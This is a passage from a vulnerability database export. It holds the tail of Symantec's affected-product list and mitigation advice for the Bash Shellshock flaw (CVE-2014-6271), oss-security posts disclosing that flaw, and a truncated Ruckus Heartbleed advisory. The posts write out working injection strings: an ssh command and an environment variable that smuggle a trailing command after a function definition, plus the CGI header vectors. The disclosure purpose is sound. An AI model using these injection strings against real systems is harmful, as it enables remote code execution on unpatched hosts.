Prevention System GX7800 4.4 \n * IBM Security Network Intrusion Prevention System GX7800 4.5 \n * IBM Security Network Intrusion Prevention System GX7800 4.6 \n * IBM Security Network Intrusion Prevention System GX7800 4.6.1 \n * IBM Security Network Intrusion Prevention System GX7800 4.6.2 \n * IBM Security Proventia Network Multi-Function Security System 4.6 \n * IBM Security Virtual Server Protection for VMware 1.1 \n * IBM Security Virtual Server Protection for VMware 1.1.0.1 \n * IBM Security Virtual Server Protection for VMware 1.1.1 \n * IBM Security Virtual Server Protection for VMware 1.1.1.0 \n * IBM Smart Analytics System 1050 \n * IBM Smart Analytics System 2050 \n * IBM Smart Analytics System 5600 \n * IBM Smart Analytics System 5710 \n * IBM Smart Analytics System 7600 \n * IBM Smart Analytics System 7700 \n * IBM Smart Analytics System 7710 \n * IBM SmartCloud Entry 2.3.0 \n * IBM SmartCloud Entry 2.4.0 \n * IBM SmartCloud Entry 3.1 \n * IBM SmartCloud Entry 3.2 \n * IBM SmartCloud Provisioning 2.1 FixPack 1 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 2 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 3 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 4 Interim Fix 1 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 4 for SVA \n * IBM SmartCloud Provisioning 2.1 FixPack 5 for SVA \n * IBM Starter Kit for Cloud 2.2.0 \n * IBM Storwize V3500 6.1 \n * IBM Storwize V3500 6.2 \n * IBM Storwize V3500 6.3 \n * IBM Storwize V3500 6.4 \n * IBM Storwize V3500 7.1 \n * IBM Storwize V3500 7.2 \n * IBM Storwize V3500 7.3 \n * IBM Storwize V3700 6.1 \n * IBM Storwize V3700 6.2 \n * IBM Storwize V3700 6.3 \n * IBM Storwize V3700 6.4 \n * IBM Storwize V3700 7.1 \n * IBM Storwize V3700 7.2 \n * IBM Storwize V3700 7.3 \n * IBM Storwize V5000 6.1 \n * IBM Storwize V5000 6.2 \n * IBM Storwize V5000 6.3 \n * IBM Storwize V5000 6.4 \n * IBM Storwize V5000 7.1 \n * IBM Storwize V5000 7.2 \n * IBM Storwize V5000 7.3 \n * IBM Storwize V7000 6.1 \n * IBM Storwize V7000 6.2 \n * IBM Storwize V7000 6.3 \n * IBM Storwize V7000 6.4 \n * IBM Storwize V7000 7.1 \n * IBM Storwize V7000 7.2 \n * IBM Storwize V7000 7.3 \n * IBM System Networking SAN24B-5 2498-F24 \n * IBM System Networking SAN96B-5 2498-F96 \n * IBM System Networking SAN96B-5 2498-N96 \n * IBM System Storage SAN04B-R 2005-R04 \n * IBM System Storage SAN06B-R 2498-R06 \n * IBM System Storage SAN24B-4 2498-B24 \n * IBM System Storage SAN384B 2499-192 \n * IBM System Storage SAN384B-2 2499-416 \n * IBM System Storage SAN40B-4 2498-B40 \n * IBM System Storage SAN48B-5 2498-F48 \n * IBM System Storage SAN768B 2499-384 \n * IBM System Storage SAN768B-2 2499-816 \n * IBM System Storage SAN80B-4 2498-B80 \n * IBM System Storage Storwize V7000 Unified 1.3 \n * IBM System Storage Storwize V7000 Unified 1.4 \n * IBM System Storage Storwize V7000 Unified 1.5 \n * IBM System X \n * IBM TSSC 7.0 \n * IBM TSSC 7.3 \n * IBM TSSC 7.3.15 \n * IBM TSSC 7.3.16 \n * IBM TotalStorage SAN16B-2 Fabric Switch 2005-B16 \n * IBM TotalStorage SAN256B Director Model M48 2109-M48 \n * IBM Unstructured Data Identification and Mgmt 7.5 \n * IBM Unstructured Data Identification and Mgmt 7.5.1 \n * IBM WebSphere Message Broker 8.0 \n * IBM WebSphere Process Server Hypervisor Edition 6.2 \n * IBM WebSphere Process Server Hypervisor Edition 7.0 \n * IBM WebSphere Process Server Hypervisor Edition for Novell SUSE 6.2 \n * IBM WebSphere Process Server Hypervisor Edition for Novell SUSE 7.0 \n * IBM WebSphere Process Server Hypervisor Edition for Red Hat 7.0 \n * IBM WebSphere Transformation Extender 8.4.0.0 \n * IBM WebSphere Transformation Extender 8.4.0.1 \n * IBM WebSphere Transformation Extender 8.4.0.2 \n * IBM WebSphere Transformation Extender 8.4.0.3 \n * IBM WebSphere Transformation Extender 8.4.0.4 \n * IBM WebSphere Transformation Extender 8.4.1.0 \n * IBM WebSphere Transformation Extender 8.4.1.1 \n * IBM WebSphere Transformation Extender 8.4.1.2 \n * IBM Worklight Quality Assurance 6.0 \n * IBM Workload Deployer 3.1 \n * IBM eDiscovery Identification and Collection 7.5 \n * IBM eDiscovery Identification and Collection 7.5.1 \n * IPFire IPFire 2.15 Update Core 82 \n * Juniper IDP 5.1 \n * Juniper IDP Series \n * Juniper JUNOS Space \n * Juniper Junos Space Ja1500 Appliance - \n * Juniper Junos Space Ja2500 Appliance - \n * Juniper NSM3000 Appliances 2012.2 \n * Juniper NSMXpress Appliances 2012.2 \n * Juniper Nsm3000 - \n * Juniper Nsmexpress - \n * Juniper STRM/JSA 2013.2 \n * Mageia Mageia \n * Mandriva Business Server 1 \n * Mandriva Business Server 1 X86 64 \n * McAfee Advanced Threat Defense 3.0.0 \n * McAfee Advanced Threat Defense 3.2.0 \n * McAfee Asset Manager 6.6 \n * McAfee Asset Manager Sensor 6.0 \n * McAfee Boot Attestation Service 3.0 \n * McAfee Cloud Identity Manager 3.0 \n * McAfee Cloud Identity Manager 3.1 \n * McAfee Cloud Identity Manager 3.5.1 \n * McAfee Cloud Single Sign On 4.0.0 \n * McAfee Cloud Single Sign On 4.0.1 \n * McAfee Email Gateway 7.0 \n * McAfee Email Gateway 7.0 Patch 1 \n * McAfee Email Gateway 7.0 Patch 3 \n * McAfee Email Gateway 7.0.1 \n * McAfee Email Gateway 7.0.2 \n * McAfee Email Gateway 7.0.3 \n * McAfee Email Gateway 7.0.4 \n * McAfee Email Gateway 7.5 \n * McAfee Email Gateway 7.5 Patch 1 \n * McAfee Email Gateway 7.5 Patch 2 \n * McAfee Email Gateway 7.5.1 \n * McAfee Email Gateway 7.6 \n * McAfee Email and Web Security Appliance 5.6 \n * McAfee Firewall Enterprise Control Center 5.2.0 \n * McAfee Firewall Enterprise Control Center 5.3.0 \n * McAfee Global Threat Intelligence (GTI) Proxy 2.0 \n * McAfee MOVE Antivirus Agentless 2.0 \n * McAfee MOVE Antivirus Agentless 3.0 \n * McAfee MOVE Antivirus Agentless 3.5 \n * McAfee MOVE Antivirus Multi-platform 2.0 \n * McAfee MOVE Antivirus Multi-platform 3.5 \n * McAfee MOVE Firewall 3.5 \n * McAfee MOVE Scheduler 2.0 \n * McAfee Move 2.6 \n * McAfee Network Data Loss Prevention 9.0 \n * McAfee Network Data Loss Prevention 9.1 \n * McAfee Network Data Loss Prevention 9.2.0 \n * McAfee Network Data Loss Prevention 9.2.1 \n * McAfee Network Data Loss Prevention 9.2.2 \n * McAfee Network Data Loss Prevention 9.3 \n * McAfee Network Security Manager 6.1.15.38 \n * McAfee Network Security Manager 6.1.15.39 \n * McAfee Network Security Manager 7.1.15.6 \n * McAfee Network Security Manager 7.1.15.7 \n * McAfee Network Security Manager 7.1.5.10 \n * McAfee Network Security Manager 7.1.5.14 \n * McAfee Network Security Manager 7.1.5.15 \n * McAfee Network Security Manager 7.5.5.8 \n * McAfee Network Security Manager 7.5.5.9 \n * McAfee Network Security Manager 8.0.0 \n * McAfee Network Security Manager 8.1.7.2 \n * McAfee Network Security Manager 8.1.7.3 \n * McAfee Network Security Sensor Appliance 6.0 \n * McAfee Network Security Sensor Appliance 7.1.0 \n * McAfee Network Security Sensor Appliance 7.5.0 \n * McAfee Network Security Sensor Appliance 8.0.0 \n * McAfee Network Security Sensor Appliance 8.1.0 \n * McAfee Next Generation Firewall 5.5.0 \n * McAfee Next Generation Firewall 5.5.6 \n * McAfee Next Generation Firewall 5.5.7 \n * McAfee Next Generation Firewall 5.7.0 \n * McAfee SIEM Enterprise Security Manager 9.1 \n * McAfee SIEM Enterprise Security Manager 9.2 \n * McAfee SIEM Enterprise Security Manager 9.3 \n * McAfee SSL VPN 1.5 \n * McAfee SaaS Email Protection 1.0 \n * McAfee SaaS Web Protection 1.0 \n * McAfee Web Gateway 7.2.0.9 \n * McAfee Web Gateway 7.3.2 \n * McAfee Web Gateway 7.3.2.10 \n * McAfee Web Gateway 7.3.2.2 \n * McAfee Web Gateway 7.3.2.4 \n * McAfee Web Gateway 7.3.2.6 \n * McAfee Web Gateway 7.3.2.8 \n * McAfee Web Gateway 7.3.2.9 \n * McAfee Web Gateway 7.3.2.9. \n * McAfee Web Gateway 7.4.0 \n * McAfee Web Gateway 7.4.1 \n * McAfee Web Gateway 7.4.1.3 \n * McAfee Web Gateway 7.4.2 \n * McAfee Web Gateway 7.4.2.1 \n * Meinberg LANTIME 4.0 \n * Meinberg LANTIME 5.0 \n * Meinberg LANTIME 6.00.0 \n * Meinberg LANTIME 6.14.0 \n * Meinberg LANTIME 6.15.0 \n * NetApp Clustered Data ONTAP \n * NetApp DATA ONTAP Edge \n * NetApp Data ONTAP 7-Mode \n * NetApp FlashRay \n * NetApp OnCommand Balance \n * NetApp OnCommand Performance Manager \n * NetApp OnCommand Unified Manager for Clustered Data ONTAP \n * NetApp SnapProtect Linux MediaAgent OVA template \n * NetApp StorageGRID \n * NetApp VASA Provider for Clustered Data ONTAP \n * OpenVPN OpenVPN 2.2.29 \n * Oracle Audit Vault and Database Firewall \n * Oracle Big Data Appliance \n * Oracle Database Appliance 12.1.2 \n * Oracle Database Appliance 2 \n * Oracle Enterprise Linux 4 \n * Oracle Enterprise Linux 6 \n * Oracle Enterprise Linux 6.2 \n * Oracle Exadata Storage Server Software \n * Oracle Exalogic \n * Oracle Exalytics \n * Oracle Key Vault \n * Oracle Linux 4 \n * Oracle Linux 5 \n * Oracle Linux 6 \n * Oracle Linux 7 \n * Oracle Solaris 10 \n * Oracle Solaris 11 \n * Oracle Solaris 11.2 \n * Oracle Solaris 8 \n * Oracle Solaris 9 \n * Oracle SuperCluster \n * Oracle VM VirtualBox 2.2 \n * Oracle VM VirtualBox 3.1 \n * Oracle VM VirtualBox 3.2 \n * Oracle VM VirtualBox 3.3 \n * Oracle Virtual Compute Appliance Software \n * Paloaltonetworks PAN-OS \n * Paloaltonetworks Panorama \n * Qnap QTS 3.0.8 \n * Qnap QTS 4.1.0 \n * Qnap QTS 4.1.1 \n * Qnap QTS 4.3.0 \n * Redhat Enterprise Linux 5 Server \n * Redhat Enterprise Linux Desktop 5 Client \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop 7 \n * Redhat Enterprise Linux ELS 4 \n * Redhat Enterprise Linux EUS 5.9.z server \n * Redhat Enterprise Linux HPC Node 6 \n * Redhat Enterprise Linux HPC Node 7 \n * Redhat Enterprise Linux Long Life 5.6 server \n * Redhat Enterprise Linux Long Life 5.9.server \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server 7 \n * Redhat Enterprise Linux Server AUS 6.2 \n * Redhat Enterprise Linux Server AUS 6.4 \n * Redhat Enterprise Linux Server AUS 6.5 \n * Redhat Enterprise Linux Server EUS 6.4.z \n * Redhat Enterprise Linux Server EUS 6.5.z \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation 7 \n * Riverbed Technology Granite CORE \n * Riverbed Technology Interceptor \n * Riverbed Technology SteelCentral NetShark \n * Riverbed Technology SteelCentral Profiler \n * Riverbed Technology SteelCentral Services Controller \n * Riverbed Technology SteelHead EX \n * Riverbed Technology Steelhead \n * Slackware Slackware Linux 13.0 \n * Slackware Slackware Linux 13.1 \n * Slackware Slackware Linux 13.1 \n * Slackware Slackware Linux 13.37 \n * Slackware Slackware Linux 14.0 \n * Slackware Slackware Linux 14.1 \n * SuSE Linux Enterprise Desktop 12 \n * SuSE Linux Enterprise Server 12 \n * SuSE Linux Enterprise Software Development Kit 12 \n * SuSE Manager (for SLE 11 SP2) 1.7 \n * SuSE SUSE Linux Enterprise Server 10 SP4 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP1 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP2 LTSS \n * SuSE SUSE Linux Enterprise Server 11 SP3 \n * SuSE SUSE Linux Enterprise Server 11 SP3 for VMware \n * SuSE SUSE Linux Enterprise Server for VMware 11 SP3 \n * SuSE SUSE Linux Enterprise Software Development Kit 11 SP3 \n * SuSE Suse Linux Enterprise Desktop 11 SP3 \n * SuSE openSUSE 12.3 \n * SuSE openSUSE 13.1 \n * SuSE openSUSE 13.2 \n * SuSE openSUSE Evergreen 11.4 \n * Symantec NetBackup Appliances 5000 1.4.4 \n * Symantec NetBackup Appliances 5030 1.4.4 \n * Symantec NetBackup Appliances 5200 1.1 \n * Symantec NetBackup Appliances 5200 2.0 \n * Symantec NetBackup Appliances 5220 2.0 \n * Symantec NetBackup Appliances 5230 2.5.2 \n * Symantec NetBackup Appliances 5230 2.5.3 \n * Symantec NetBackup Appliances 5230 2.5.4 \n * Symantec NetBackup Appliances 5230 2.6 \n * Symantec NetBackup Enterprise Server 7.0 \n * Symantec NetBackup Server 7.0 \n * Trendmicro Advanced Reporting Module (ARM) 1.5 \n * Trendmicro Advanced Reporting Module (ARM) 1.6 \n * Trendmicro Data Loss Prevention Network Monitor (DLPNM) 2.0 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.0 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.2 \n * Trendmicro Interscan Messaging Security Virtual Appliance (IMSVA) 8.5 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 5.5 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 5.6 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 6.0 SP1 \n * Trendmicro Interscan Web Security Virtual Appliance (IWSVA) 6.5 \n * Ubuntu Ubuntu Linux 10.04 ARM \n * Ubuntu Ubuntu Linux 10.04 Amd64 \n * Ubuntu Ubuntu Linux 10.04 I386 \n * Ubuntu Ubuntu Linux 10.04 Powerpc \n * Ubuntu Ubuntu Linux 10.04 Sparc \n * Ubuntu Ubuntu Linux 12.04 LTS amd64 \n * Ubuntu Ubuntu Linux 12.04 LTS i386 \n * Ubuntu Ubuntu Linux 14.04 LTS \n * VMWare Application Dependency Planner \n * VMWare ESX 4.0 \n * VMWare ESX 4.1 \n * VMWare ESXi \n * VMWare HealthAnalyzer 5.0 \n * VMWare Horizon DaaS Platform 5.0 \n * VMWare Horizon Workspace 1.5 \n * VMWare Horizon Workspace 1.8 \n * VMWare Horizon Workspace 1.8.1 \n * VMWare Horizon Workspace 2.0 \n * VMWare IT Business Management Suite 1.0 \n * VMWare Mirage Gateway 5.0 \n * VMWare NSX for Multi-Hypervisor 4.0.3 \n * VMWare NSX for Multi-Hypervisor 4.1.2 \n * VMWare NSX for vSphere 6.0.4 \n * VMWare NVP 3.0 \n * VMWare NVP 3.2.2 \n * VMWare Socialcast On Premise \n * VMWare Studio 2.0 \n * VMWare Studio 2.0 BETA \n * VMWare Studio 2.1 \n * VMWare TAM Data Manager \n * VMWare VMware Data Recovery 2.0.3 \n * VMWare Vcenter Converter Standalone 5.1 \n * VMWare Vcenter Converter Standalone 5.5 \n * VMWare Viewplanner 3.0 \n * VMWare Workbench 3.0 \n * VMWare vCenter Application Discovery Manager \n * VMWare vCenter Hyperic Server 5.0 \n * VMWare vCenter Infrastructure Navigator 5.0 \n * VMWare vCenter Infrastructure Navigator 5.8 \n * VMWare vCenter Log Insight 1.0 \n * VMWare vCenter Log Insight 2.0 \n * VMWare vCenter Operations Manager 5.8.1 \n * VMWare vCenter Orchestrator Appliance 4.0 \n * VMWare vCenter Orchestrator Appliance 5.0 \n * VMWare vCenter Server Appliance 5.0 \n * VMWare vCenter Server Appliance 5.0 Update 1 \n * VMWare vCenter Server Appliance 5.0 Update 2 \n * VMWare vCenter Server Appliance 5.1 \n * VMWare vCenter Server Appliance 5.1 Patch 1 \n * VMWare vCenter Server Appliance 5.1 Update 1 \n * VMWare vCenter Server Appliance 5.1.0 Update b \n * VMWare vCenter Server Appliance 5.5 \n * VMWare vCenter Server Appliance 5.5 Update 1 \n * VMWare vCenter Site Recovery Manager 5.1.1 \n * VMWare vCenter Site Recovery Manager 5.5.1 \n * VMWare vCenter Support Assistant 5.5.0 \n * VMWare vCenter Support Assistant 5.5.1 \n * VMWare vCloud Automation Center (vCAC) 6.0 \n * VMWare vCloud Automation Center Application Services 6.0 \n * VMWare vCloud Connector 2.0 \n * VMWare vCloud Director Appliance 5.0 \n * VMWare vCloud Networking and Security 5.1 \n * VMWare vCloud Networking and Security 5.1.2 \n * VMWare vCloud Networking and Security 5.1.3 \n * VMWare vCloud Networking and Security 5.1.4.2 \n * VMWare vCloud Networking and Security 5.5 \n * VMWare vCloud Networking and Security 5.5.1 \n * VMWare vCloud Networking and Security 5.5.2 \n * VMWare vCloud Networking and Security 5.5.3 \n * VMWare vCloud Usage Meter 3.0 \n * VMWare vFabric Application Director 5.0.0 \n * VMWare vFabric Application Director 5.2.0 \n * VMWare vFabric Application Director 6.0 \n * VMWare vFabric Postgres 9.1.6 \n * VMWare vFabric Postgres 9.1.9 \n * VMWare vFabric Postgres 9.2.2 \n * VMWare vFabric Postgres 9.2.4 \n * VMWare vSphere App HA 1.0 \n * VMWare vSphere Big Data Extensions 1.0 \n * VMWare vSphere Big Data Extensions 2.0 \n * VMWare vSphere Data Protection 5.0 \n * VMWare vSphere Management Assistant 5.0 \n * VMWare vSphere Replication 5.5.1 \n * VMWare vSphere Replication 5.6 \n * VMWare vSphere Storage Appliance 5.1.3 \n * VMWare vSphere Storage Appliance 5.5.1 \n * Xerox ColorQube 8700 \n * Xerox ColorQube 8900 \n * Xerox ColorQube 9301 \n * Xerox ColorQube 9302 \n * Xerox ColorQube 9303 \n * Xerox ColorQube 9393 \n * Xerox Phaser 6700 \n * Xerox Phaser 7800 \n * Xerox WorkCentre 3655 \n * Xerox WorkCentre 5735 \n * Xerox WorkCentre 5740 \n * Xerox WorkCentre 5745 \n * Xerox WorkCentre 5755 \n * Xerox WorkCentre 5945 \n * Xerox WorkCentre 5955 \n * Xerox WorkCentre 6655 \n * Xerox WorkCentre 7220 \n * Xerox WorkCentre 7225 \n * Xerox WorkCentre 7228 \n * Xerox WorkCentre 7232 \n * Xerox WorkCentre 7235 \n * Xerox WorkCentre 7238 \n * Xerox WorkCentre 7242 \n * Xerox WorkCentre 7245 \n * Xerox WorkCentre 7525 \n * Xerox WorkCentre 7530 \n * Xerox WorkCentre 7535 \n * Xerox WorkCentre 7545 \n * Xerox WorkCentre 7556 \n * Xerox WorkCentre 7755 \n * Xerox WorkCentre 7765 \n * Xerox WorkCentre 7775 \n * Xerox WorkCentre 7830 \n * Xerox WorkCentre 7835 \n * Xerox WorkCentre 7845 \n * Xerox WorkCentre 7855 \n * Xerox WorkCentre 7970 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic \n\n**Implement multiple redundant layers of security.** \nVarious memory-protection schemes (such as nonexecutable and randomly mapped memory segments) may hinder an attacker's ability to exploit this vulnerability to execute arbitrary code.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure database servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2014-09-24T00:00:00", "published": "2014-09-24T00:00:00", "id": "SMNTC-70103", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/70103", "type": "symantec", "title": "GNU Bash CVE-2014-6271 Remote Code Execution Vulnerability", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\nOn Wed, Sep 24, 2014 at 04:05:51PM +0200, Florian Weimer wrote:\r\n&gt; Stephane Chazelas discovered a vulnerability in bash, related to how\r\n&gt; environment variables are processed: trailing code in function\r\n&gt; definitions was executed, independent of the variable name.\r\n&gt;\r\n&gt; In many common configurations, this vulnerability is exploitable over\r\n&gt; the network.\r\n&gt;\r\n&gt; Chet Ramey, the GNU bash upstream maintainer, will soon release\r\n&gt; official upstream patches.\r\n\r\nMore detail is already out:\r\n\r\nhttps://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\r\nhttp://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html\r\n\r\nFlorian posted a Debian security advisory on this &#40;[DSA 3032-1] bash\r\nsecurity update&#41; to the debian-security-announce list, but somehow it is\r\nnot yet seen at:\r\n\r\nhttps://www.debian.org/security/\r\nhttps://lists.debian.org/debian-security-announce/2014/\r\n\r\n&#40;I guess it will be very soon.&#41;\r\n\r\nI&#39;ve just confirmed that the issue can be exploited via OpenSSH setting\r\nSSH_ORIGINAL_COMMAND:\r\n\r\n$ ssh -o &#39;rsaauthentication yes&#39; 0 &#39;&#40;&#41; { ignored; }; /usr/bin/id&#39; \r\nuid=500&#40;sandbox&#41; gid=500&#40;sandbox&#41; groups=500&#40;sandbox&#41;\r\nReceived disconnect from 127.0.0.1: Command terminated on signal 11.\r\n\r\nThis is with command=&quot;set&quot; in .ssh/authorized_keys for the key being\r\nused. &#40;Without the &quot;; /usr/bin/id&quot; portion, the command prints the\r\nenvironment variables, including SSH_ORIGINAL_COMMAND being the function\r\nwith just &quot;ignored&quot; in its body.&#41; As we can see, the command runs, and\r\nmoreover in this case bash happened to segfault after having run &quot;id&quot;.\r\n\r\nI see no good workaround. Starting the forced command with &quot;unset\r\nSSH_ORIGINAL_COMMAND &amp;&amp;&quot; does not help - we&#39;d need to unset the variable\r\nbefore starting bash, not from bash.\r\n\r\nTERM is another attack vector, but IIRC sshd does not set TERM when\r\nno-pty is used. So, speaking of SSH forced commands, it appears to be\r\nonly SSH_ORIGINAL_COMMAND that we have no good workaround for.\r\n\r\nIndeed, there are many other setups where the problem is exploitable,\r\nnot just SSH forced commands.\r\n\r\nAlexander\r\n\r\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31103", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31103", "title": "Re: [oss-security] CVE-2014-6271: remote code execution through bash", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:54", "bulletinFamily": "software", "description": "\r\n\r\n* Florian Weimer:\r\n\r\n&gt; Chet Ramey, the GNU bash upstream maintainer, will soon release\r\n&gt; official upstream patches.\r\n\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048\r\nhttp://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-025\r\n\r\nSomeone has posted large parts of the prenotification as a news\r\narticle, so in the interest of full disclosure, here is what we wrote\r\nto the non-vendors &#40;vendors also received patches&#41;:\r\n\r\nDebian and other GNU/Linux vendors plan to disclose a critical,\r\nremotely exploitable security vulnerability in bash this week, related\r\nto the processing of environment variables. Stephane Chazelas\r\ndiscovered it, and CVE-2014-6271 has been assigned to it.\r\n\r\nThe issue is currently under embargo &#40;not public&#41;, and you receive\r\nthis message as a courtesy notification because we assume that you\r\nhave network-based filtering capabilities, so that you can work on\r\nways to protect a significant number of customers. However, you\r\nshould not yet distribute IPS/IDS signatures, publicly or to\r\ncustomers.\r\n\r\nAt present, public disclosure is scheduled for Wednesday, 2014-09-24\r\n14:00 UTC. We do not expect the schedule to change, but we may be\r\nforced to revise it.\r\n\r\n\r\nThe technical details of the vulnerability follow.\r\n\r\nBash supports exporting not just shell variables, but also shell\r\nfunctions to other bash instances, via the process environment to\r\n&#40;indirect&#41; child processes. Current bash versions use an environment\r\nvariable named by the function name, and a function definition\r\nstarting with \u201c&#40;&#41; {\u201d in the variable value to propagate function\r\ndefinitions through the environment. The vulnerability occurs because\r\nbash does not stop after processing the function definition; it\r\ncontinues to parse and execute shell commands following the function\r\ndefinition. For example, an environment variable setting of\r\n\r\n VAR=&#40;&#41; { ignored; }; /bin/id\r\n\r\nwill execute /bin/id when the environment is imported into the bash\r\nprocess. &#40;The process is in a slightly undefined state at this point.\r\nThe PATH variable may not have been set up yet, and bash could crash\r\nafter executing /bin/id, but the damage has already happened at this\r\npoint.&#41;\r\n\r\nThe fact that an environment variable with an arbitrary name can be\r\nused as a carrier for a malicious function definition containing\r\ntrailing commands makes this vulnerability particularly severe; it\r\nenables network-based exploitation.\r\n\r\n\r\n\r\nSo far, HTTP requests to CGI scripts have been identified as the major\r\nattack vector.\r\n\r\nA typical HTTP request looks like this:\r\n\r\nGET /path?query-param-name=query-param-value HTTP/1.1\r\nHost: www.example.com\r\nCustom: custom-header-value\r\n\r\nThe CGI specification maps all parts to environment variables. With\r\nApache httpd, the magic string \u201c&#40;&#41; {\u201d can appear in these places:\r\n\r\n* Host &#40;\u201cwww.example.com\u201d, as REMOTE_HOST&#41;\r\n* Header value &#40;\u201ccustom-header-value\u201d, as HTTP_CUSTOM in this example&#41;\r\n* Server protocol &#40;\u201cHTTP/1.1\u201d, as SERVER_PROTOCOL&#41;\r\n\r\nThe user name embedded in an Authorization header could be a vector as\r\nwell, but the corresponding REMOTE_USER variable is only set if the\r\nuser name corresponds to a known account according to the\r\nauthentication configuration, and a configuration which accepts the\r\nmagic string appears somewhat unlikely.\r\n\r\nIn addition, with other CGI implementations, the request method\r\n&#40;\u201cGET\u201d&#41;, path &#40;\u201c/path\u201d&#41; and query string\r\n&#40;\u201cquery-param-name=query-param-value\u201d&#41; may be vectors, and it is\r\nconceivable for \u201cquery-param-value\u201d as well, and perhaps even\r\n\u201cquery-param-name\u201d.\r\n\r\nThe other vector is OpenSSH, either through AcceptEnv variables, TERM\r\nor SSH_ORIGINAL_COMMAND.\r\n\r\nOther vectors involving different environment variable set by\r\nadditional programs are expected.\r\n\r\n\r\n\r\nAgain, please do not disclose this issue to customers or the general\r\npublic until the embargo has expired.\r\n\r\n", "modified": "2014-09-25T00:00:00", "published": "2014-09-25T00:00:00", "id": "SECURITYVULNS:DOC:31102", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31102", "title": "Re: [oss-security] CVE-2014-6271: remote code execution through bash", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nRUCKUS ADVISORY ID 041414\r\n\r\nCustomer release date: April 14, 2014\r\nPublic release date: April 14, 2014\r\n\r\nTITLE\r\n\r\nOpenSSL 1.0.1 library&#39;s &quot;Heart bleed&quot; vulnerability - CVE-2014-0160\r\n\r\n\r\nSUMMARY\r\n\r\nOpenSSL library is used in Ruckus products to implement various\r\nsecurity related features. A vulnerability has been discovered in\r\nOpenSSL library which may allow an unauthenticated, remote attacker to\r\nretrieve memory in chunks of 64 kilobytes from a connected client or\r\nserver. An exploit could disclose portions of memory containing\r\nsensitive security material such as passwords and private keys.\r\n\r\n\r\nAFFECTED SOFTWARE VERSIONS AND DEVICES\r\n\r\n\r\n Device Affected software\r\n- --------------------- ------------------\r\nSmart Cell Gateway 1.1.x\r\nSmartCell Access Points NOT AFFECTED\r\nZoneDirector Controllers NOT AFFECTED\r\nZoneFlex Access Points NOT AFFECTED\r\n\r\n\r\nAny products or services not mentioned in the table above are not affected\r\n\r\n\r\nDETAILS\r\n\r\nA vulnerability has been discovered in the popular OpenSSL\r\ncryptographic software library. This weakness exists in OpenSSL&#39;s\r\nimplementation of the TLS/DTLS &#40;transport layer security protocols&#41;\r\nheartbeat extension &#40;RFC6520&#41;. This vulnerability is due to a missing\r\nbounds check in implementation of the handling of the heartbeat\r\nextension. When exploited, this issue may lead to leak of memory\r\ncontents from the server to the client and from the client to the\r\nserver. These memory contents could contain sensitive security\r\nmaterial such as passwords and private keys.\r\n\r\n\r\nIMPACT\r\n\r\nRuckus devices incorporate OpenSSL library to implement various\r\nsecurity related features. Below is list of the affected components:\r\n\r\n- - Administrative HTTPS Interface &#40;Port 8443&#41;\r\n\r\n\r\nCVSS v2 Base Score:5.0 &#40;MEDIUM&#41; &#40;AV:N/AC:L/Au:N/C:P/I:N/A:N&#41;\r\n\r\n\r\n \r\nWORKAROUNDS\r\n\r\nRuckus recommends that all customers apply the appropriate patch&#40;es&#41;\r\nas soon as practical. However, in the event that a patch cannot\r\nimmediately be applied, the following suggestions might help reduce\r\nthe risk:\r\n\r\n - Do not expose administrative interfaces of Ruckus devices to\r\nuntrusted networks such as the Internet.\r\n\r\n - Use a firewall to limit traffic to/from Ruckus device&#39;s\r\nadministrative interface to trusted hosts.\r\n\r\n \r\n\r\nSOLUTION\r\n\r\nRuckus recommends that all customers apply the appropriate patch&#40;es&#41;\r\nas soon as practical.\r\n\r\nThe following software builds have the fix &#40;any later builds will 